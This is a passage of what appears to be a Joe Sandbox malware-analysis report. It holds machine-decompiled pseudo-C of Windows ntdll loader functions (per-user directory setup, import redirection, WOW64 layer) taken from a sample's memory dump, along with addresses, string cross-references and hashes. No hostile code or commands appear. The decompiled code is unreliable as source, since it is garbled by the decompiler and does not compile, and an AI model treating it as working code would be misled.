				_t25 = E1D7B0130();
				if(_t25 != 0) {
					L1D7A2330(_t25, 0x1d885b5c);
					_t27 =  *0x1d889224; // 0x0
					_t75 =  *_t27;
					__eflags = _t72;
					if(_t72 != 0) {
						__eflags = _t75;
						if(_t75 == 0) {
							goto L13;
						} else {
							_t80 = _t75 - 1;
							goto L7;
						}
					} else {
						__eflags = _t75;
						if(_t75 == 0) {
							E1D789050( *0x1d88921c, _t75);
						}
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							L13:
							E1D7A24D0(0x1d885b5c);
							_t65 = 0xe;
							asm("int 0x29");
							_t87 = (_t85 & 0xfffffff8) - 0x224;
							_v20 =  *0x1d88b370 ^ _t87;
							_t76 = _t65;
							 *0x1d8891e0( &_v544, 0x104, _t75, _t82);
							_t67 =  *_t65() + _t33;
							__eflags = _t67;
							if(_t67 != 0) {
								__eflags =  *0x1d88660c;
								_v560 =  &_v552;
								_v564 = _t67;
								_v562 = 0x208;
								if(__eflags == 0) {
									L25:
									_push( &_v556);
									_push( &_v564);
									E1D81CB20(0x1d885b5c, _t72, _t76, __eflags);
									goto L15;
								} else {
									_t76 = ( *0x1d886608 & 0x0000ffff) + 2 + _t67;
									_t42 = E1D7A5D90(_t67,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t76);
									_v580 = _t42;
									__eflags = _t42;
									if(_t42 != 0) {
										__eflags = 0;
										_v570 = _t76;
										_v572 = 0;
										E1D7B10D0(_t67,  &_v572, 0x1d886608);
										E1D7B10D0(_t67,  &_v580,  &_v572);
										E1D79FE40(_t67,  &_v588, ";");
										E1D7A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x1d88660c);
										 *0x1d886608 = _v608;
										_t54 = _v604;
										 *0x1d88660c = _t54;
										 *0x1d886604 = _t54;
										E1D81D4A0(_t67, __eflags);
										goto L25;
									} else {
										_t56 =  *0x1d8837c0; // 0x0
										__eflags = _t56 & 0x00000003;
										if((_t56 & 0x00000003) != 0) {
											_push("Failed to reallocate the system dirs string !\n");
											_push(0);
											_push("LdrpInitializePerUserWindowsDirectory");
											_push(0xcf4);
											_push("minkernel\\ntdll\\ldrinit.c");
											E1D80E692();
											_t56 =  *0x1d8837c0; // 0x0
											_t87 = _t87 + 0x14;
										}
										__eflags = _t56 & 0x00000010;
										if((_t56 & 0x00000010) != 0) {
											asm("int3");
										}
										_t39 = 0xc0000017;
									}
								}
							} else {
								L15:
								_t39 = 0;
								__eflags = 0;
							}
							_pop(_t77);
							__eflags = _v36 ^ _t87;
							return E1D7D4B50(_t39, 0x1d885b5c, _v36 ^ _t87, _t70, _t72, _t77);
						} else {
							_t80 = _t75 + 1;
							__eflags = _t80;
							L7:
							_t58 =  *0x1d889224; // 0x0
							 *_t58 = _t80;
							__eflags = _t72;
							if(_t72 != 0) {
								__eflags = _t80;
								if(_t80 == 0) {
									E1D789050( *0x1d88921c, 1);
								}
							}
							_t25 = E1D7A24D0(0x1d885b5c);
							goto L1;
						}
					}
				} else {
					L1:
					return _t25;
				}
			}




































                                                    0x1d7cc640
                                                    0x1d7cc642
                                                    0x1d7cc644
                                                    0x1d7cc645
                                                    0x1d7cc647
                                                    0x1d7cc64e
                                                    0x1d7cc65a
                                                    0x1d7cc65f
                                                    0x1d7cc664
                                                    0x1d7cc666
                                                    0x1d7cc668
                                                    0x1d7cc6a4
                                                    0x1d7cc6a6
                                                    0x00000000
                                                    0x1d7cc6a8
                                                    0x1d7cc6a8
                                                    0x00000000
                                                    0x1d7cc6a8
                                                    0x1d7cc66a
                                                    0x1d7cc66a
                                                    0x1d7cc66c
                                                    0x1d7cc675
                                                    0x1d7cc675
                                                    0x1d7cc67a
                                                    0x1d7cc67d
                                                    0x1d7cc6ab
                                                    0x1d7cc6ac
                                                    0x1d7cc6b3
                                                    0x1d7cc6b4
                                                    0x1d7cc6be
                                                    0x1d7cc6cb
                                                    0x1d7cc6dc
                                                    0x1d7cc6df
                                                    0x1d7cc6e9
                                                    0x1d7cc6e9
                                                    0x1d7cc6eb
                                                    0x1d808090
                                                    0x1d80809b
                                                    0x1d8080a4
                                                    0x1d8080a9
                                                    0x1d8080ae
                                                    0x1d80817f
                                                    0x1d808183
                                                    0x1d808188
                                                    0x1d808189
                                                    0x00000000
                                                    0x1d8080b4
                                                    0x1d8080c4
                                                    0x1d8080cc
                                                    0x1d8080d1
                                                    0x1d8080d5
                                                    0x1d8080d7
                                                    0x1d808114
                                                    0x1d808116
                                                    0x1d80811b
                                                    0x1d80812a
                                                    0x1d808139
                                                    0x1d808148
                                                    0x1d80815e
                                                    0x1d808167
                                                    0x1d80816c
                                                    0x1d808170
                                                    0x1d808175
                                                    0x1d80817a
                                                    0x00000000
                                                    0x1d8080d9
                                                    0x1d8080d9
                                                    0x1d8080de
                                                    0x1d8080e0
                                                    0x1d8080e2
                                                    0x1d8080e7
                                                    0x1d8080e9
                                                    0x1d8080ee
                                                    0x1d8080f3
                                                    0x1d8080f8
                                                    0x1d8080fd
                                                    0x1d808102
                                                    0x1d808102
                                                    0x1d808105
                                                    0x1d808107
                                                    0x1d808109
                                                    0x1d808109
                                                    0x1d80810a
                                                    0x1d80810a
                                                    0x1d8080d7
                                                    0x1d7cc6f1
                                                    0x1d7cc6f1
                                                    0x1d7cc6f1
                                                    0x1d7cc6f1
                                                    0x1d7cc6f1
                                                    0x1d7cc6fa
                                                    0x1d7cc6fb
                                                    0x1d7cc705
                                                    0x1d7cc67f
                                                    0x1d7cc67f
                                                    0x1d7cc67f
                                                    0x1d7cc680
                                                    0x1d7cc680
                                                    0x1d7cc685
                                                    0x1d7cc687
                                                    0x1d7cc689
                                                    0x1d7cc68b
                                                    0x1d7cc68d
                                                    0x1d7cc697
                                                    0x1d7cc697
                                                    0x1d7cc68d
                                                    0x1d7cc69d
                                                    0x00000000
                                                    0x1d7cc69d
                                                    0x1d7cc67d
                                                    0x1d7cc650
                                                    0x1d7cc650
                                                    0x1d7cc653
                                                    0x1d7cc653

                                                    APIs
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 1D8080F3
                                                    • Failed to reallocate the system dirs string !, xrefs: 1D8080E2
                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 1D8080E9
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes
                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 3446177414-1783798831
                                                    • Opcode ID: 8ddca0448cf38ab031b7bfbf1f955e64f5801c4d382907f27f4b73478e78028c
                                                    • Instruction ID: be80d69543751ff2b8f3cb541976fdd2fa04aadf84516f5a29b6d90dd7d9e262
                                                    • Opcode Fuzzy Hash: 8ddca0448cf38ab031b7bfbf1f955e64f5801c4d382907f27f4b73478e78028c
                                                    • Instruction Fuzzy Hash: A0412675508351AFC712EB28DD84B5B77F8AF48764F01492AF959E7261E734E800CB93
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D8143D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 50%
                                                    			E1D8143D5(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __esi;
				signed char _t37;
				signed int _t41;
				intOrPtr _t44;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				void* _t54;
				signed int _t59;
				signed int _t60;
				signed int _t64;
				signed int _t66;
				intOrPtr _t68;
				signed int _t69;
				intOrPtr _t70;

				_t68 = _a4;
				_t54 = __edx;
				_v28 = __ecx;
				_v24 = E1D814B46(_t68);
				_v12 =  *((intOrPtr*)(_t54 + 0x2c));
				_v8 =  *((intOrPtr*)(_t54 + 0x30));
				_v20 =  *((intOrPtr*)(_t54 + 0x90));
				_t37 =  *0x1d886714; // 0x0
				_v16 = _t68;
				_t69 =  *0x1d886710; // 0x0
				if((_t37 & 0x00000001) != 0) {
					if(_t69 == 0) {
						_t69 = 0;
						__eflags = 0;
					} else {
						_t69 = _t69 ^ 0x1d886710;
					}
				}
				_t64 = _t37 & 1;
				while(_t69 != 0) {
					__eflags = E1D814528(_t54, _t69,  &_v24, _t69);
					if(__eflags >= 0) {
						if(__eflags <= 0) {
							L25:
							while(_t69 != 0) {
								_t41 = E1D814528(_t54, _t69,  &_v24, _t69);
								__eflags = _t41;
								if(_t41 != 0) {
									break;
								}
								_t66 =  *0x1d885ca0; // 0x0
								__eflags = _t66;
								if(_t66 == 0) {
									L28:
									__eflags =  *0x1d8837c0 & 0x00000005;
									_t70 =  *((intOrPtr*)(_t69 + 0x20));
									if(( *0x1d8837c0 & 0x00000005) != 0) {
										_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
										_push( *((intOrPtr*)(_t44 + 0x2a8)));
										_push( *((intOrPtr*)(_t44 + 0x2a4)));
										_push(_a4);
										_push( *((intOrPtr*)(_t54 + 0x30)));
										_push( *((intOrPtr*)(_t54 + 0x2c)));
										_push( *((intOrPtr*)(_v28 + 0x30)));
										E1D80E692("minkernel\\ntdll\\ldrredirect.c", 0x12b, "LdrpCheckRedirection", 2, "Import Redirection: %wZ %wZ!%s redirected to %wZ\n",  *((intOrPtr*)(_v28 + 0x2c)));
									}
									L27:
									return _t70;
								}
								 *0x1d8891e0( *((intOrPtr*)(_v28 + 0x28)),  *((intOrPtr*)(_t69 + 0x24)));
								_t49 =  *_t66();
								__eflags = _t49;
								if(_t49 != 0) {
									goto L28;
								}
								_t50 =  *(_t69 + 4);
								_t59 = _t69;
								__eflags = _t50;
								if(_t50 == 0) {
									while(1) {
										_t69 =  *(_t69 + 8) & 0xfffffffc;
										__eflags = _t69;
										if(_t69 == 0) {
											goto L25;
										}
										__eflags =  *_t69 - _t59;
										if( *_t69 == _t59) {
											goto L25;
										}
										_t59 = _t69;
									}
									continue;
								}
								_t69 = _t50;
								_t60 =  *_t69;
								__eflags = _t60;
								if(_t60 == 0) {
									continue;
								} else {
									goto L20;
								}
								do {
									L20:
									_t51 =  *_t60;
									_t69 = _t60;
									_t60 = _t51;
									__eflags = _t51;
								} while (_t51 != 0);
							}
							_t70 = 0xffbadd11;
							goto L27;
						}
						_t52 =  *(_t69 + 4);
						L9:
						__eflags = _t64;
						if(_t64 == 0) {
							L12:
							_t69 = _t52;
							continue;
						}
						__eflags = _t52;
						if(_t52 == 0) {
							goto L12;
						}
						_t69 = _t69 ^ _t52;
						continue;
					}
					_t52 =  *_t69;
					goto L9;
				}
				goto L25;
			}


























                                                    0x1d8143e2
                                                    0x1d8143e5
                                                    0x1d8143e7
                                                    0x1d8143f3
                                                    0x1d8143fa
                                                    0x1d814401
                                                    0x1d81440b
                                                    0x1d81440f
                                                    0x1d814414
                                                    0x1d814418
                                                    0x1d814420
                                                    0x1d814424
                                                    0x1d81442e
                                                    0x1d81442e
                                                    0x1d814426
                                                    0x1d814426
                                                    0x1d814426
                                                    0x1d814424
                                                    0x1d814433
                                                    0x1d81445e
                                                    0x1d814443
                                                    0x1d814445
                                                    0x1d81444b
                                                    0x00000000
                                                    0x1d8144c0
                                                    0x1d81446a
                                                    0x1d81446f
                                                    0x1d814471
                                                    0x00000000
                                                    0x00000000
                                                    0x1d814473
                                                    0x1d814479
                                                    0x1d81447b
                                                    0x1d8144d4
                                                    0x1d8144d4
                                                    0x1d8144db
                                                    0x1d8144de
                                                    0x1d8144e6
                                                    0x1d8144e9
                                                    0x1d8144ef
                                                    0x1d8144f9
                                                    0x1d8144fc
                                                    0x1d8144ff
                                                    0x1d814502
                                                    0x1d81451e
                                                    0x1d814523
                                                    0x1d8144c9
                                                    0x1d8144d1
                                                    0x1d8144d1
                                                    0x1d814489
                                                    0x1d81448f
                                                    0x1d814491
                                                    0x1d814493
                                                    0x00000000
                                                    0x00000000
                                                    0x1d814495
                                                    0x1d814498
                                                    0x1d81449a
                                                    0x1d81449c
                                                    0x1d8144b8
                                                    0x1d8144bb
                                                    0x1d8144bb
                                                    0x1d8144be
                                                    0x00000000
                                                    0x00000000
                                                    0x1d8144b2
                                                    0x1d8144b4
                                                    0x00000000
                                                    0x00000000
                                                    0x1d8144b6
                                                    0x1d8144b6
                                                    0x00000000
                                                    0x1d8144b8
                                                    0x1d81449e
                                                    0x1d8144a0
                                                    0x1d8144a2
                                                    0x1d8144a4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d8144a6
                                                    0x1d8144a6
                                                    0x1d8144a6
                                                    0x1d8144a8
                                                    0x1d8144aa
                                                    0x1d8144ac
                                                    0x1d8144ac
                                                    0x1d8144b0
                                                    0x1d8144c4
                                                    0x00000000
                                                    0x1d8144c4
                                                    0x1d81444d
                                                    0x1d814450
                                                    0x1d814450
                                                    0x1d814452
                                                    0x1d81445c
                                                    0x1d81445c
                                                    0x00000000
                                                    0x1d81445c
                                                    0x1d814454
                                                    0x1d814456
                                                    0x00000000
                                                    0x00000000
                                                    0x1d814458
                                                    0x00000000
                                                    0x1d814458
                                                    0x1d814447
                                                    0x00000000
                                                    0x1d814447
                                                    0x00000000

                                                    APIs
                                                    Strings
                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 1D814519
                                                    • LdrpCheckRedirection, xrefs: 1D81450F
                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1D814508
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes
                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                    • API String ID: 3446177414-3154609507
                                                    • Opcode ID: d0a946de874cb087f4cad5cb47a7fbc712aa08631ffc45d7236ee7947631f2f5
                                                    • Instruction ID: 1390c2e6fa5bbf7e6c5a9fbdddfaee0c275a9957263d87c62f38ac7d63eb1fb2
                                                    • Opcode Fuzzy Hash: d0a946de874cb087f4cad5cb47a7fbc712aa08631ffc45d7236ee7947631f2f5
                                                    • Instruction Fuzzy Hash: E641B0726066319FCB12CF5CC940E6677E4BF48A60F0646AAFC99DF251D731E808CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D815B90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 31%
                                                    			E1D815B90(intOrPtr __ecx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t21;
				intOrPtr _t36;
				void* _t38;
				void* _t40;

				_t36 = __ecx;
				_t21 = E1D7ADDA0(0, 0, 0x1d761b68,  &_v8);
				if(_t21 < 0) {
					return _t21;
				}
				_t43 = _v8;
				if(E1D7ACF00(_t36, _t38, _v8, 0x1d761b78, 0,  &_v12, 0, _v0) >= 0) {
					_t43 = _v8;
					if(E1D7ACF00(_t36, _t38, _v8, 0x1d761b70, 0,  &_v20, 0, _v0) >= 0) {
						_t43 = _v8;
						if(E1D7ACF00(_t36, _t38, _v8, 0x1d761b80, 0,  &_v16, 0, _v0) >= 0) {
							_t36 = _v12;
							 *0x1d8891e0(0, L"Wow64 Emulation Layer", __edi);
							_t40 = _v12();
							if(_t40 != 0) {
								 *0x1d8891e0(_t40, 4, 0, _a12, 0, _a4, 0, _a8, 0);
								_v16();
								_t36 = _v20;
								 *0x1d8891e0(_t40);
								_v20();
							}
						}
					}
				}
				return E1D7ACD80(_t36, _t43);
			}












                                                    0x1d815b90
                                                    0x1d815ba6
                                                    0x1d815bad
                                                    0x1d815c51
                                                    0x1d815c51
                                                    0x1d815bb7
                                                    0x1d815bcd
                                                    0x1d815bd2
                                                    0x1d815be8
                                                    0x1d815bed
                                                    0x1d815c03
                                                    0x1d815c05
                                                    0x1d815c0f
                                                    0x1d815c18
                                                    0x1d815c1c
                                                    0x1d815c31
                                                    0x1d815c37
                                                    0x1d815c3a
                                                    0x1d815c3e
                                                    0x1d815c44
                                                    0x1d815c44
                                                    0x1d815c47
                                                    0x1d815c03
                                                    0x1d815be8
                                                    0x00000000

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes
                                                    • String ID: Wow64 Emulation Layer
                                                    • API String ID: 3446177414-921169906
                                                    • Opcode ID: 44789b0db6ef2fe168c09e37b9f04e1938cafaf512d4c419911acd2812efdfe3
                                                    • Instruction ID: bc679d39cffa13f8c620cf13bff5645046f852277c58727eb6575de180c6ade1
                                                    • Opcode Fuzzy Hash: 44789b0db6ef2fe168c09e37b9f04e1938cafaf512d4c419911acd2812efdfe3
                                                    • Instruction Fuzzy Hash: 2F211A7A50011DBFAB019AA4DD88DFF7B7CEF486A9F090155FE05A6110E630AE01DB72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D80EBD0 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 21%
                                                    			E1D80EBD0(void* __ebx, intOrPtr __ecx, signed char __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t84;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr _t94;
				intOrPtr _t95;
				short* _t115;
				intOrPtr* _t118;
				intOrPtr _t125;
				intOrPtr _t127;
				signed char _t128;
				intOrPtr _t132;
				intOrPtr _t135;
				intOrPtr* _t136;
				intOrPtr _t139;
				void* _t141;

				_t128 = __edx;
				_push(0x58);
				_push(0x1d86cc00);
				E1D7E7BE4(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t141 - 0x40)) = __edx;
				_t135 = __ecx;
				 *((intOrPtr*)(_t141 - 0x20)) = __ecx;
				_t118 = 2;
				 *((intOrPtr*)(_t141 - 0x28)) = _t118;
				 *(_t141 - 0x68) =  *(_t141 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t141 - 0x64)) = 0x1d80f550;
				 *((intOrPtr*)(_t141 - 0x60)) = E1D80F5D0;
				if( *((intOrPtr*)(_t141 + 0xc)) >= _t118) {
					_t115 =  *((intOrPtr*)(_t141 + 8));
					 *_t115 = 0;
					_t132 = 0;
				} else {
					_t132 = 0xc0000004;
					_t115 = 0;
				}
				 *((intOrPtr*)(_t141 - 0x1c)) = _t132;
				 *((intOrPtr*)(_t141 - 0x3c)) = _t115;
				if(_t135 == 0 || (_t128 & 0x00000002) != 0) {
					_t135 = _t141 - 0x68;
					 *((intOrPtr*)(_t141 - 0x20)) = _t135;
				}
				 *((intOrPtr*)(_t141 - 0x4c)) = _t135;
				_t84 = 0;
				_t136 =  *((intOrPtr*)(_t141 + 0x10));
				while(1) {
					 *(_t141 - 0x2c) = _t84;
					if(_t84 >= 1) {
						break;
					}
					 *((intOrPtr*)(_t141 - 0x44)) = 0x2800;
					 *(_t141 - 0x34) = 1;
					if(_t136 != 0) {
						 *_t136 = _t118;
					}
					if((_t128 & 0x00000002) != 0) {
						_t23 = 0x1d7618a4 + _t84 * 0x14; // 0x1d80eaf0
						 *0x1d8891e0();
						 *((intOrPtr*)( *_t23))();
						_t84 =  *(_t141 - 0x2c);
					}
					 *(_t141 - 4) =  *(_t141 - 4) & 0x00000000;
					_t86 = _t84 * 0x14;
					 *(_t141 - 0x38) = _t86;
					_t31 = _t86 + 0x1d761898; // 0x1d80e9f0
					_t136 =  *_t31;
					_t118 = _t136;
					 *0x1d8891e0( *((intOrPtr*)(_t141 - 0x20)), _t141 - 0x30, _t141 - 0x50);
					_t88 =  *_t136();
					if(_t88 < 0) {
						L31:
						_t132 = _t88;
						goto L32;
					} else {
						if( *((intOrPtr*)(_t141 - 0x30)) != 0) {
							_push(_t141 - 0x24);
							_push( *((intOrPtr*)(_t141 - 0x30)));
							_push( *((intOrPtr*)(_t141 - 0x20)));
							_t136 =  *((intOrPtr*)( *(_t141 - 0x38) + 0x1d76189c));
							while(1) {
								_t118 = _t136;
								 *0x1d8891e0();
								_t88 =  *_t136();
								if(_t88 < 0) {
									goto L31;
								}
								if( *((intOrPtr*)(_t141 - 0x24)) !=  *((intOrPtr*)(_t141 - 0x30))) {
									_t94 =  *((intOrPtr*)(_t141 - 0x44));
									if(_t94 != 0) {
										_t95 = _t94 - 1;
										 *((intOrPtr*)(_t141 - 0x44)) = _t95;
										 *((intOrPtr*)(_t141 - 0x5c)) = _t95;
										_t125 =  *((intOrPtr*)(_t141 - 0x28)) +  *(_t141 - 0x34) * 0x12c;
										 *((intOrPtr*)(_t141 - 0x28)) = _t125;
										 *(_t141 - 0x34) = 1;
										 *((intOrPtr*)(_t141 - 0x58)) = 1;
										if( *((intOrPtr*)(_t141 + 0xc)) >= _t125) {
											 *_t115 = 0x12c;
											_t136 =  *((intOrPtr*)( *(_t141 - 0x38) + 0x1d7618a0));
											_t118 = _t136;
											 *0x1d8891e0( *((intOrPtr*)(_t141 - 0x20)), _t115 + 4,  *((intOrPtr*)(_t141 - 0x24)),  *((intOrPtr*)(_t141 - 0x50)),  *((intOrPtr*)(_t141 - 0x40)));
											_t88 =  *_t136();
											if(_t88 < 0) {
												goto L31;
											} else {
												_t128 =  *(_t115 + 0xc);
												if(_t128 == 0) {
													 *(_t141 - 0x34) = 0;
													 *((intOrPtr*)(_t141 - 0x58)) = 0;
													goto L28;
												} else {
													_t128 = _t128 + 0x3c;
													_t136 =  *((intOrPtr*)(_t141 - 0x20));
													_t118 = _t136;
													_t88 = E1D80F5EC(_t118, _t128, _t141 - 0x54, 4);
													if(_t88 < 0) {
														goto L31;
													} else {
														_t127 =  *(_t115 + 0xc) +  *((intOrPtr*)(_t141 - 0x54));
														 *((intOrPtr*)(_t141 - 0x48)) = _t127;
														_t128 = _t127 + 8;
														_t118 = _t136;
														_t88 = E1D80F5EC(_t118, _t128, _t115 + 0x124, 4);
														if(_t88 < 0) {
															goto L31;
														} else {
															_t128 =  *((intOrPtr*)(_t141 - 0x48)) + 0x58;
															_t118 = _t136;
															_t88 = E1D80F5EC(_t118, _t128, _t115 + 0x120, 4);
															if(_t88 < 0) {
																goto L31;
															} else {
																_t128 =  *((intOrPtr*)(_t141 - 0x48)) + 0x34;
																_t118 = _t136;
																_t88 = E1D80F5EC(_t118, _t128, _t115 + 0x128, 4);
																if(_t88 < 0) {
																	goto L31;
																} else {
																	_t115 = _t115 + 0x12c;
																	 *((intOrPtr*)(_t141 - 0x3c)) = _t115;
																	 *_t115 = 0;
																	goto L29;
																}
															}
														}
													}
												}
											}
										} else {
											_t132 = 0xc0000004;
											 *((intOrPtr*)(_t141 - 0x1c)) = 0xc0000004;
											L28:
											_t139 =  *((intOrPtr*)(_t141 - 0x20));
											L29:
											_push(_t141 - 0x24);
											_push( *((intOrPtr*)(_t141 - 0x24)));
											_push(_t139);
											_t136 =  *((intOrPtr*)( *(_t141 - 0x38) + 0x1d76189c));
											continue;
										}
									} else {
										_t132 = 0xc0000229;
										L32:
										 *((intOrPtr*)(_t141 - 0x1c)) = _t132;
									}
								}
								goto L33;
							}
							goto L31;
						}
					}
					L33:
					 *(_t141 - 4) = 0xfffffffe;
					E1D80EE16();
					_t84 =  *(_t141 - 0x2c) + 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t141 - 0x10));
				return _t132;
			}


















                                                    0x1d80ebd0
                                                    0x1d80ebd0
                                                    0x1d80ebd2
                                                    0x1d80ebd7
                                                    0x1d80ebdc
                                                    0x1d80ebdf
                                                    0x1d80ebe1
                                                    0x1d80ebe6
                                                    0x1d80ebe7
                                                    0x1d80ebea
                                                    0x1d80ebee
                                                    0x1d80ebf5
                                                    0x1d80ebff
                                                    0x1d80ec0a
                                                    0x1d80ec0f
                                                    0x1d80ec12
                                                    0x1d80ec01
                                                    0x1d80ec01
                                                    0x1d80ec06
                                                    0x1d80ec06
                                                    0x1d80ec14
                                                    0x1d80ec17
                                                    0x1d80ec1c
                                                    0x1d80ec23
                                                    0x1d80ec26
                                                    0x1d80ec26
                                                    0x1d80ec29
                                                    0x1d80ec2c
                                                    0x1d80ec2e
                                                    0x1d80ec31
                                                    0x1d80ec31
                                                    0x1d80ec37
                                                    0x00000000
                                                    0x00000000
                                                    0x1d80ec3d
                                                    0x1d80ec44
                                                    0x1d80ec4d
                                                    0x1d80ec4f
                                                    0x1d80ec4f
                                                    0x1d80ec54
                                                    0x1d80ec59
                                                    0x1d80ec61
                                                    0x1d80ec67
                                                    0x1d80ec69
                                                    0x1d80ec69
                                                    0x1d80ec6c
                                                    0x1d80ec70
                                                    0x1d80ec73
                                                    0x1d80ec81
                                                    0x1d80ec81
                                                    0x1d80ec87
                                                    0x1d80ec89
                                                    0x1d80ec8f
                                                    0x1d80ec93
                                                    0x1d80edf0
                                                    0x1d80edf0
                                                    0x00000000
                                                    0x1d80ec99
                                                    0x1d80ec9d
                                                    0x1d80eca6
                                                    0x1d80eca7
                                                    0x1d80ecaa
                                                    0x1d80ecb0
                                                    0x1d80edde
                                                    0x1d80edde
                                                    0x1d80ede0
                                                    0x1d80ede6
                                                    0x1d80edea
                                                    0x00000000
                                                    0x00000000
                                                    0x1d80ecc1
                                                    0x1d80ecc7
                                                    0x1d80eccc
                                                    0x1d80ecd8
                                                    0x1d80ecd9
                                                    0x1d80ecdc
                                                    0x1d80ece9
                                                    0x1d80eceb
                                                    0x1d80ecf1
                                                    0x1d80ecf4
                                                    0x1d80ecfa
                                                    0x1d80ed0e
                                                    0x1d80ed24
                                                    0x1d80ed2a
                                                    0x1d80ed2c
                                                    0x1d80ed32
                                                    0x1d80ed36
                                                    0x00000000
                                                    0x1d80ed3c
                                                    0x1d80ed3c
                                                    0x1d80ed41
                                                    0x1d80edc4
                                                    0x1d80edc7
                                                    0x00000000
                                                    0x1d80ed43
                                                    0x1d80ed49
                                                    0x1d80ed4c
                                                    0x1d80ed4f
                                                    0x1d80ed51
                                                    0x1d80ed58
                                                    0x00000000
                                                    0x1d80ed5e
                                                    0x1d80ed61
                                                    0x1d80ed64
                                                    0x1d80ed70
                                                    0x1d80ed73
                                                    0x1d80ed75
                                                    0x1d80ed7c
                                                    0x00000000
                                                    0x1d80ed7e
                                                    0x1d80ed8a
                                                    0x1d80ed8d
                                                    0x1d80ed8f
                                                    0x1d80ed96
                                                    0x00000000
                                                    0x1d80ed98
                                                    0x1d80eda4
                                                    0x1d80eda7
                                                    0x1d80eda9
                                                    0x1d80edb0
                                                    0x00000000
                                                    0x1d80edb2
                                                    0x1d80edb2
                                                    0x1d80edb8
                                                    0x1d80edbd
                                                    0x00000000
                                                    0x1d80edbd
                                                    0x1d80edb0
                                                    0x1d80ed96
                                                    0x1d80ed7c
                                                    0x1d80ed58
                                                    0x1d80ed41
                                                    0x1d80ecfc
                                                    0x1d80ecfc
                                                    0x1d80ed01
                                                    0x1d80edca
                                                    0x1d80edca
                                                    0x1d80edcd
                                                    0x1d80edd0
                                                    0x1d80edd1
                                                    0x1d80edd4
                                                    0x1d80edd8
                                                    0x00000000
                                                    0x1d80edd8
                                                    0x1d80ecce
                                                    0x1d80ecce
                                                    0x1d80edf2
                                                    0x1d80edf2
                                                    0x1d80edf2
                                                    0x1d80eccc
                                                    0x00000000
                                                    0x1d80ecc1
                                                    0x00000000
                                                    0x1d80edde
                                                    0x1d80ec9d
                                                    0x1d80edf5
                                                    0x1d80edf5
                                                    0x1d80edfc
                                                    0x1d80ee04
                                                    0x1d80ee04
                                                    0x1d80ee47
                                                    0x1d80ee53

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes
                                                    • String ID:
                                                    • API String ID: 3446177414-0
